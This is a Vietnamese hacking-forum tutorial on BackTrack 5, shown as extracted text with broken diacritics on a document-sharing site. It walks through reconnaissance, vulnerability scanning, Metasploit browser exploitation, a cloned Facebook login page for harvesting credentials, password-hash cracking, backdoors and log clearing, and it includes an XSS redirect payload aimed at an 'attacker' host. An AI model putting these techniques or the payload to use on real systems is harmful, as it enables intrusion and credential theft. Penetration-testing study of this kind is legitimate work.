1. Trang chủ
  2. » Công Nghệ Thông Tin

Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt

27 744 1
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 27
Dung lượng 3,01 MB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

Tài liu hng dn này cutynhangheo dành tng cho anh em HCEGroup và TheGioiMang.OrG nhân ngày reopen ca 2 din đàn thân yêu nói trên .Và cutynhangheo có đôi li tâm s vi anh em mi vào chi trò ngh thut này cái nhé .Trong ngh thut hack không có cái gi là s li bing và chây ý, anh em nên quan nim 1 điu khi ta cm thy tha mãn vi nhng gì ta đang có tc là lúc đó ta bt đu lc hu vi th gii .Trong ngh thut hack kin thc, k nng, t duy, s ranh ma và thêm mt chút may mn luôn luôn đi chung vi nhau .Vì vy nu ta cm thy mình đã có đc nhng gì mình mun thì lúc đó mình bt đu mt tt c .Cutynhangheo cng xin nói rng tài liu này ch dùng đ tham kho và s dng đ thc nghim tn công ( pentest ) trong môi trng lab hoc c quan, t chc có nhu cu tn công thc nghim trên h thng ca chính h .Kin thc trong cun sách hng dn này do cutynhangheo thu thp và tham kho nhiu ngun trên Internet, chân thành cm n các tác gi v ngun tài liu mà cutynhangheo đã tham kho qua .

Trang 1

Tài li u h ng d n s d ng

Trang 2

M c l c

L i nói đ u 3

Ph n I : Thu th p thông tin và gi i thi u v các công c VA 4

1 Thu th p thông tin : 4

2 ánh giá l h ng : 6

Ph n II : Các b công c khai thác ( exploit tools ) và frameworks 10

1 B công c Metasploit Armitage : 10

2 B công c Social-Engineer Tookit : 11

3 B công c leo thang đ c quy n (Privilege escalation tools ) : 12

4 B công c John the Ripper : 13

Ph n III : Các b công c khai thác và frameworks – ti p theo 15

1 ánh c p các thông tin t trình duy t : 15

2 Th c nghi m k thu t đánh c p thông tin : 15

3 B công c Hashcat trong BackTrack 5 : 17

4 Th c nghi m k thu t leo thang đ c quy n : 18

5 Khai thác SQL Injection trong BackTrack 5 : 18

6 S th t b t ng đ ng sau các công c mang tên khai thác t đ ng : 19

Ph n IV : Làm th nào đ n mình 20

1 T i sao ph i n mình ? 20

2 OS backdoor Cymothoa : 20

3 Meterpreter có ph i là backdoor : 22

4 L i d ng l h ng đ có backdoor : 23

Ph n V : Chi ti t m t cu c t n công gi đ nh 24

1 B công c Autoscan Network trong BackTrack 5 : 24

2 Tài nguyên l h ng tr c tuy n : 24

3 Pentest m c tiêu : 25

4 Xóa b d u v t : 26

5 T ng quan v mô hình b o m t Windows : 26

Trang 3

L i nói đ u

Tài li u h ng d n này cutynhangheo dành t ng cho anh em HCEGroup và TheGioiMang.OrG nhân

ngày reopen c a 2 di n đàn thân yêu nói trên Và cutynhangheo có đôi l i tâm s v i anh em m i vào

ch i trò ngh thu t này cái nhé Trong ngh thu t hack không có cái g i là s l i bi ng và chây ý, anh

em nên quan ni m 1 đi u khi ta c m th y th a mãn v i nh ng gì ta đang có t c là lúc đó ta b t đ u l c

h u v i th gi i Trong ngh thu t hack ki n th c, k n ng, t duy, s ranh ma và thêm m t chút may m n luôn luôn đi chung v i nhau Vì v y n u ta c m th y mình đã có đ c nh ng gì mình mu n thì lúc đó

mình b t đ u m t t t c Cutynhangheo c ng xin nói r ng tài li u này ch dùng đ tham kh o và s d ng

đ th c nghi m t n công ( pentest ) trong môi tr ng lab ho c c quan, t ch c có nhu c u t n công th c

nghi m trên h th ng c a chính h Ki n th c trong cu n sách h ng d n này do cutynhangheo thu th p

và tham kh o nhi u ngu n trên Internet, chân thành c m n các tác gi v ngu n tài li u mà

cutynhangheo đã tham kh o qua

L n n a cutynhangheo xin nh c l i tài li u này cutynhangheo biên d ch l i và cung c p cho anh em

ch nh m m c đích h c t p và nghiên c u, cutynhangheo không ch u trách nhi m vi c anh em s d ng

ki n th c, k thu t và t duy trong cu n tài li u này dùng đ vi ph m pháp lu t n c C ng Hòa Xã H i

Ch Ngh a Vi t Nam M i hành vi m o danh hay s d ng các ki n th c nói trên cutynhangheo không ch u

trách nhi m tr c pháp lu t

Trang 4

Ph n I : Thu th p thông tin và gi i thi u v các công c VA

Phiên b n BackTrack 5 có tên mã là “Revolution” ( t m d ch là “C i ti n” ), phiên b n này r t đ c

gi i b o m t (nh t là gi i Hack) mong đ i; phiên b n này đ c phát hành vào tháng 05 n m 2011 So v i

phiên b n BackTrack 4 R2 thì phiên b n này có nhi u s phát tri n m nh m h n r t nhi u Phiên b n BackTrack 5 này đ c cho r ng các nhà phát tri n đã xây d ng l i t đ u, cung c p cho chúng ta nh ng

c i ti n t t h n và c ng nh fix các l i so v i phiên b n BackTrack 4 R2 tr c đó

BackTrack 5 đ c đ t tên theo m t thu t toán đ c g i là “backtracking” BackTrack 5 cung c p

m t b các công c t crack password, pentest và scan ports BackTrack 5 có 12 b các công c đ c th

hi n nh hình 1 bên d i

Hình 1 : Các b công c trong BackTrack 5

Ng i ki m tra b o m t ( t m g i là Pentester – v i nh ng ng i nh anh em chúng ta t m g i là

sript kiddies, nói dân dã 1 tí là dân đi hack, cutynhangheo xin nh c l i là chúng ta ch a ph i là hacker

th c th OK ! ) th ng th c hi n các quá trình t n công th c nghi m theo 5 b c ( tùy vào t ng môi

tr ng và tr ng h p c th có th nhi u h n 5 b c ) nh sau :

1 B c 1 là thu th p thông tin c a h th ng c n t n công th c nghi m

2 B c 2 là scan bugs ( quét l i ) và đánh giá các đi m y u có th có c a h th ng c n t n công

5 B c 5 là xóa b t t c các d u v t ( trong phim thì g i là “phi tang, di t ch ng”; hehehe )

Trong ph n h ng d n t n công th c nghi m ( pentest ) v i BackTrack 5 này, chúng ta s cùng xem

xét qua ph n thu th p thông tin và b công c đánh giá các l h ng ( n u có ) đ c cung c p trong phiên

b n BackTrack 5 này nhé

1 Thu th p thông tin :

Trang 5

Thu th p thông tin là b c ti n hành đ u tiên và c c k quan tr ng trong quá trình t n công th c

nghi m Trong b c này, pentester và attacker s thu th p và có đ c các thông tin s b c a m c

tiêu c n t n công nh h th ng m ng m c tiêu, các c ng đang m , h th ng máy đang live và các

d ch v đang ch y trên t ng c ng đó Theo b n ta thu th p đ c gì ? R t đ n gi n ta s có đ c 1

b ng thông tin v s đ c u trúc c a m c tiêu, bên c nh đó ta còn có thông tin v các h th ng và h

th ng m ng đang đ c s d ng c a m c tiêu Hình 2 bên d i đây là hình ch p c a công c Zenmap,

BackTrack cung c p công c này đ giúp pentester và attacker có th thu th p đ c thông tin và

phân tích h th ng m ng c a m c tiêu

Hình 2 : Công c Zenmap UI trong BackTrack 5

Các ch đ scan c a Zenmap s cung c p cho ta thông tin v m c tiêu nh d ch v đang ch y

trên t ng c ng, phiên b n h đi u hành c a m c tiêu, đ ng đi đ n m c tiêu, workgroups và tài

kho n ng i dùng Các thông tin này th c s h u ích v i ph ng pháp “white box testing” ( t t nhiên c ng h u ích v i attacker )

M t công c thu th p thông tin khác trong BackTrack 5 đó là CMS identification và IDS – IPS identification dùng đ thu th p thông tin và phân tích cho ng d ng web CMS identification s cung

c p các thông tin s b v h th ng CMS m c tiêu, b công c này có th đ c dùng đ đánh giá các

l h ng trên h th ng CMS và đi u thu n ti n nh t là b công c này cung c p các exploit ( khai thác

) có s n đ pentester và attacker có th ki m tra trên h th ng m c tiêu Các công c nh joomscan (

CMS Joomla ) s đ c nói sau trong ph n h ng d n này

M t công c thú v và c c k m nh khác n a là Maltego, công c này th ng dùng đ phân tích

v SMTP Hình 3 bên d i cho th y Maltego đang ho t đ ng

Trang 6

Hình 3 : Công c Maltego UI trong BackTrack 5

Trên b ng Palette c a Maltego cho ta th y các thông tin nh DNS Name, Domain, Location,

URL, email và các thông tin chi ti t khác v website Maltego s d ng các tùy bi n khác nhau trên các entities cung c p cho pentester và attacker các thông tin chi ti t c n thi t v m c tiêu Maltego cung c p m t k t qu tr c quan b ng giao di n đ h a v các thông tin thu th p đ c c a m c tiêu

2 ánh giá l h ng :

B c th 2 trong t n công th c nghi m pentest là đánh giá các l h ng ( n u có ) Sau khi đã

th c hi n b c đ u tiên thành công

Thông tin và s đ t ch c c a m c tiêu có đ c thông qua footprinting ( nh h i x a

cutynhangheo đ c đ n đây c nh nh là “in d u n” ), lúc này chúng ta s ti n hành đánh giá phân tích các đi m y u ho c các l h ng trong h th ng c n t n công Trên internet hi n nay có r t nhi u

trang web v b o m t cung c p danh sách các l h ng có th s d ng đ khai thác, nh ng chúng ta s

ch t p trung vào nh ng gì BackTrack 5 cung c p trong series h ng d n này nhé

Web application scans đ c s d ng đ đánh giá và tìm các l h ng c a ng d ng web Hình 4 bên d i đây gi i thi u v công c joomscan trong BackTrack 5 Joomscan có tính n ng là s d ng

các l h ng đ c cung c p trong tài nguyên đ tìm ki m l h ng c a website ch y trên n n Joomla

Trang 7

Hình 4 : Công c Joomscan

Joomscan s d ng câu l nh nh sau :

./joomscan.pl –u <string> -x proxy:port

Ph n < string> chính là Website ch y Joomla c n t n công Joomscan có các tùy ch n kèm theo

nh sau ki m tra phiên b n c a Joomla, ki m tra Server, ki m tra Firewall đang ho t đ ng …Nh

hình 4 trên Website Joomla m c tiêu đang ch y trên máy ch web Apache Server và phiên b n PHP đang s d ng là 5.5.16

OpenVAS ( Open Vulnerability Assessment System ) trong BackTrack 5 : M Application 

Backtrack  Vulnerability scanners  OpenVAS s cung c p cho b n m t danh sách các tùy ch n

nh hình 5 bên d i

Trang 8

Hình 5 : Các tùy ch n c a OpenVAS trong BackTrack 5

OpenVAS là m t công c m nh trong vi c phân tích và đánh giá l h ng đ i v i m c tiêu c n t n công Nh ng tr c khi s d ng b công c này nhà cung c p khuy n cáo b n c n thi t l p ch ng

th c v i tùy ch n OpenVAS MkCert Sau đó, chúng ta c n t o m t tài kho n ng i dùng m i t trình menu nh trong h ng d n này

Ng i dùng có th tùy ch nh đ áp d ng các rule c a mình, ho c s đ c cung c p m t t p h p

r ng b ng cách nh n t h p phím Ctrl + D Khi m t ng i dùng m i đã đ c thêm vào v i các thông tin đ ng nh p, chúng ta đã có th b t đ u s d ng b công c này

Trang 9

Hình 6 : Quá trình thêm tài kho n c a OpenVAS

OpenVAS ho t đ ng đánh giá l h ng trên mô hình Client/Server B n nên c p nh t th ng

xuyên danh sách các l h ng m i cho th vi n c a OpenVAS đ có th th c hi n các b c ki m tra có

hi u qu nh t

OpenVAS và Nessus Scanner :

Nessus Scanner là b công c phân tích và đánh giá l h ng t đ ng Chúng ta hãy l t qua

xem s khác bi t gi a 2 b công c này

Nessus Scanner có 2 phiên b n, mi n phí và tr ti n ( cái v này làm nhi u dân đi hack nh

chúng ta vô cùng ái ng i nh ! Ch a hack mà đã t n ti n r i ), trong khi đó OpenVAS thì l i hoàn

toàn mi n phí ( cái này đ c àh nghen, đ ng bao gi có suy ngh đ free là đ cùi anh em nhé, có

nh ng đ free mà ch t l ng ngon h n h n đ tr ti n đàng hoàng, mà xài đ free thì các bác

mu n đánh b n quy n c ng ch ng có c gì x i đ c anh em ta ) Theo đánh giá g n đây cho bi t

thì các tài nguyên cung c p các plugins cho 2 b công c này có s khác nhau đáng k , và tùy

thu c vào nh n đ nh c a m i ng i s đ a ra nh n xét là s có 1 b công c đ c khuyên không

nên s d ng, t t nhiên 1 ch ng trình scan t đ ng s có th đ a ra nh ng đánh giá sai l m, đi u

này là không th tránh kh i ( anh em s h i cutynhangheo t i sao sai l m còn gi i thi u,

cutynhangheo xin tr l i vì b n ch t ch ng trình do con ng i l p trình ra, nó ch bi t làm theo

ch nó không có suy ngh nh con ng i nhé )

Trên internet có r t nhi u nhóm đ c l p ra đ h ng d n cho nhau cách s d ng các b

công c h tr khác, t t nhiên có c các b công c scan t đ ng, nh ng cutynhangheo xin

khuy n cáo v i anh em nh sau ta ch s d ng các b công c scan t đ ng đ đánh giá toàn di n

các l h ng c a các m c tiêu c n t n công BackTrack 5 c ng cung c p các b công c khác

cùng th lo i nh các b công c CISCO, ngh a là các b công c này đ c s d ng đ tìm l

h ng trên h th ng m ng ch y ph n c ng CISCO .Các Fuzzer c ng đ c cung c p, đ c phân

thành 2 lo i Network Fuzzers và VOIP Fuzzers

ó là đi u gi i thích t i sao BackTrack 5 đ c cung c p r t nhi u b công c đ thu th p thông tin và đánh giá l h ng Trong ph n h ng d n này cutynhangheo s c g ng gi i thi u m t ho c hai

b công c mà cutynhangheo c m th y h u d ng cho anh em nhé ( còn l i n u anh em mu n nâng

cao skill thì làm n t lên Google Search dùm cái h, có 1 câu ng n ng “Tôi ch cho cái c n câu

ch tôi không cho con cá” )

Trang 10

Ph n II : Các b công c khai thác ( exploit tools ) và frameworks

Trong ph n đ u c a cu n h ng d n v BackTrack 5 này, chúng ta đã đi qua 2 b c là thu th p thông tin và đánh giá l h ng v i các b công c đ c gi i thi u trên Trong ph n hai này, chúng ta s

đ c gi i thi u v các b công c đ khai thác các l h ng t xa và tìm hi u làm th nào đ s d ng các

exploitation frameworks đ leo thang đ c quy n ví d nh s d ng John the Ripper đ crack m t kh u và

truy c p vào m t h th ng Windows t xa nhé

1 B công c Metasploit Armitage :

Metasploit Armitage là phiên b n giao di n đ h a c a b công c khai thác l h ng n i ti ng

Metasploit Framework Cutynhangheo s vi t m t series v h ng d n s d ng Metasploit trong th i

gian s p t i và s cung c p s m cho anh em Trong cu n sách h ng d n v BackTrack 5 này, chúng

ta s đ c gi i thi u cách s d ng autopwn đ khai thác l h ng trình duy t trên h th ng Windows

XP b ng b công c Metasploit Armitage

Hình 7 : B công c Metasploit Armitage ; h th ng Windows b xâm nh p t xa đ c th hi n b ng màu

đ Giao di n console bên d i cho th y quá trình s d ng autopwn đ khai thác l h ng trình duy t trên

h th ng … Armitage c ng thu th p đ c thông tin v h đi u hành c a m c tiêu t n công

V i ph n h ng d n khai thác này, anh em c n 1 website b l i cross-site scripting ( XSS ) v i l

h ng là URL redirection ( chuy n h ng URL ) Khi victim nh p chu t vào 1 URL c th nào đó trên

trình duy t, h th ng c a victim s t o ra m t meterpreter shell o n code URL redirection s có

d ng nh sau :

http://www.xyz?c= "> < meta HTTPEQUIV= "REFRESH" content= "0; url= http://attacker">

Trang 11

Tính n ng auto-migration đ c s d ng khai thác s t o ra m t ti n trình m i trên h th ng

victim, b i vì n u nh chúng ta s d ng ph ng pháp khai thác l h ng không s d ng migration, thì

cu c t n công s b h y b ho c k t thúc khi ng i dùng đóng trình duy t Vì v y Migration s giúp

chúng ta duy trì tr ng thái k t n i liên t c v i h th ng victim cho dù victim có đóng trình duy t đi

ch ng n a

Hình 8 : M t minh h a v URL redirection t 1 website b l i XSS , xyz.com, đ n 192.168.13.132 attacker

2 B công c Social-Engineer Tookit :

B công c Social- Engineer Tookit ( SET ) s đ c cutynhangheo gi i thi u chi ti t trong m t

cu n sách h ng d n khác trong th i gian s p t i Trong ph n h ng d n BackTrack 5 này, chúng ta

s t p trung vào ki u t n công đ c g i là tab nabbing Trong m t cu c t n công gi đ nh, victim m

1 liên k t trên trình duy t, ngay sau khi victim chuy n sang 1 tab khác, trang web ban đ u s đ c

thay th b ng 1 trang web gi m o, ki u t n công này cho phép các attacker có đ c các thông tin

đ ng nh p c a victim Victim s b đánh l a đ nh p tên tài kho n và m t kh u c a anh ta vào trang

gi m o này

Trong ki u t n công “social engineer” này, chúng ta s ch n 1 website đ t n công vector và clone trang web đó Chúng ta c n xác đ nh nh ng trang web nào chúng ta c n clone, có các form

đ ng nh p thông tin mà chúng ta mong mu n Cutynhangheo đã clone 1 trang c a Facebook cho

ph n h ng d n BackTrack 5 này v i m c đích ch là trình di n ( cutynhangheo không khuy n khích anh em làm đi u t ng t ) Xin l u ý anh em r ng quá trình clone s không có tác d ng khi chúng ta

không có k t n i internet nhé

Hình 9 bên d i cho th y trang đ ng nh p Facebook gi m o, và hình 10 bên d i các d li u

g i qua ph ng th c POST b SET b t l i

Ph ng pháp t n công này có th m r ng v i các URL mà anh em d tính clone, các trang web

s d ng ph ng th c POST đ đ y d li u, thông tin đó s luôn b thu th p l i b i HTTP ho c

HTTPS SET h tr t t 2 giao th c trên, và cho k t qu t t khi sniffs thông tin đ ng nh p

Trang 12

Hình 9 : M t trang đ ng nh p gi m o Facebook đ c t o ra b i b công c Social-Engineer Toolkit v i

các tùy ch n đ c c u hình b i attacker

Hình 10 : D li u POST b thu th p b i b công c Social-Engineer Toolkit framework t 1 trang đ ng

nh p gi m o Facebook

3 B công c leo thang đ c quy n (Privilege escalation tools ) :

Chúng ta bi t r ng không ph i lúc nào chúng ta c ng có quy n administrator hay superuser đ

có th xâm nh p vào m t h th ng t xa c ( d n quá thì không còn gì là thú v OK ! ) Gi ng nh 1

attacker, chúng ta c n m t quy n t i đa trên h th ng victim đ có th th c thi các payloads và th c

hi n các hành đ ng chúng ta mong mu n ( ví d leo lên quy n administrator hay get root gì đó )

.BackTrack 5 cung c p cho chúng ta 1 lo t các b công c leo thang đ c quy n đ đáp ng nh ng

nhu c u th c ti n này, gi ng hình 11 bên d i

Trang 13

Hình 11 : Các phân lo i trong b công c leo thang đ c quy n trong BackTrack 5

Nh trên hình 11 chúng ta th y, BackTrack 5 cung c p 4 phân lo i trong b công c leo thang

đ c quy n, m i lo i đ u có cách làm vi c khác nhau ( đ hi u h t các phân lo i này, cutynhangheo đ

ngh anh em s d ng đ c m nh n )

4 B công c John the Ripper :

M t khi victim đã b xâm nh p ( cutynhangheo đ ngh anh em ch a bi t làm sao xâm nh p xin

đ c l i cu n h ng d n s d ng SET và MSF c a cutynhangheo đ bi t thêm chi ti t nhé, không gi i

thích trong ph n h ng d n này m t l m ), các cracker th ng s d ng b công c John the Ripper

đ crack các Password Windows hashes t đó s d ng đ leo thang đ c quy n và có đ c quy n

qu n tr h th ng

Sau khi khai thác qua l h ng, các pass hashes này s đ c dump l i thành 1 file text và cung c p

cho John the Ripper John the Ripper là b công c r t m nh v vi c crack các password hashes Hình 12 và 13 bên d i th hi n quá trình crack password hashes liên quan đ n vi c leo thang đ c

quy n trên h th ng Windows Cu c t n công nh demo có th s d ng 2 b công c Metasploit

Framework hay Social-Engineer Toolkit

Hình 12 : ây là quá trình dump password hashes b ng b công c hashdump, k t quá này s xu t ra file

text đ cung c p cho John the Ripper th c hi n crack pass

H th ng victim theo nh hình bên d i s đ c li t kê danh sách các tài kho n và m t kh u theo

cách c a John the Ripper

Ngày đăng: 27/05/2014, 19:46

HÌNH ẢNH LIÊN QUAN

Hình 1 : Các b  công c  trong BackTrack 5 - Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt
Hình 1 Các b công c trong BackTrack 5 (Trang 4)
Hình 2 : Công c  Zenmap UI trong BackTrack 5 - Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt
Hình 2 Công c Zenmap UI trong BackTrack 5 (Trang 5)
Hình 3 : Công c  Maltego UI trong BackTrack 5 - Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt
Hình 3 Công c Maltego UI trong BackTrack 5 (Trang 6)
Hình 4 : Công c  Joomscan Joomscan s  d ng câu l nh nh  sau : - Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt
Hình 4 Công c Joomscan Joomscan s d ng câu l nh nh sau : (Trang 7)
Hình 5 : Các tùy ch n c a OpenVAS trong BackTrack 5 . - Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt
Hình 5 Các tùy ch n c a OpenVAS trong BackTrack 5 (Trang 8)
Hình 6 : Quá trình thêm tài kho n c a OpenVAS - Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt
Hình 6 Quá trình thêm tài kho n c a OpenVAS (Trang 9)
Hình 7 : B  công c  Metasploit Armitage ; h  th ng Windows b  xâm nh p t   xa đ c th  hi n b ng màu - Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt
Hình 7 B công c Metasploit Armitage ; h th ng Windows b xâm nh p t xa đ c th hi n b ng màu (Trang 10)
Hình 10 : D  li u POST b  thu th p b i b  công c  Social-Engineer Toolkit framework t   1 trang đ ng - Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt
Hình 10 D li u POST b thu th p b i b công c Social-Engineer Toolkit framework t 1 trang đ ng (Trang 12)
Hình 14 : Quá trình xâm nh p thành công trên h  th ng Windows XP . - Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt
Hình 14 Quá trình xâm nh p thành công trên h th ng Windows XP (Trang 16)
Hình 15 :  File Firepassword.exe đã đ c t i lên thành công trên h  th ng victim . - Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt
Hình 15 File Firepassword.exe đã đ c t i lên thành công trên h th ng victim (Trang 16)
Hình 17 : Các câu l nh c a Hashcat trong BackTrack 5 Trong ph n h ng d n này, nh  trên hình 17 anh em có th  th y đ c cú pháp đ  s  d ng  Hashcat v i l i chú thích rõ ràng cho m i tùy ch n .Các tùy ch n này đ c phân lo i nh  sau : - Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt
Hình 17 Các câu l nh c a Hashcat trong BackTrack 5 Trong ph n h ng d n này, nh trên hình 17 anh em có th th y đ c cú pháp đ s d ng Hashcat v i l i chú thích rõ ràng cho m i tùy ch n .Các tùy ch n này đ c phân lo i nh sau : (Trang 18)
Hình 19 :  Trên đây là quá trình  ch y Cymothoa v i pid 1484 và l ng nghe   port 100 - Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt
Hình 19 Trên đây là quá trình ch y Cymothoa v i pid 1484 và l ng nghe port 100 (Trang 21)
Hình 23 :  Handler đ c t o ra trong Metasploit đ  l ng nghe backdoor . - Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt
Hình 23 Handler đ c t o ra trong Metasploit đ l ng nghe backdoor (Trang 22)
Hình 24 : H  th ng victim b  truy c p b i BT5 thông qua backdoor . - Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt
Hình 24 H th ng victim b truy c p b i BT5 thông qua backdoor (Trang 23)
Hình 28 : Clearev - Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt
Hình 28 Clearev (Trang 26)

TỪ KHÓA LIÊN QUAN

w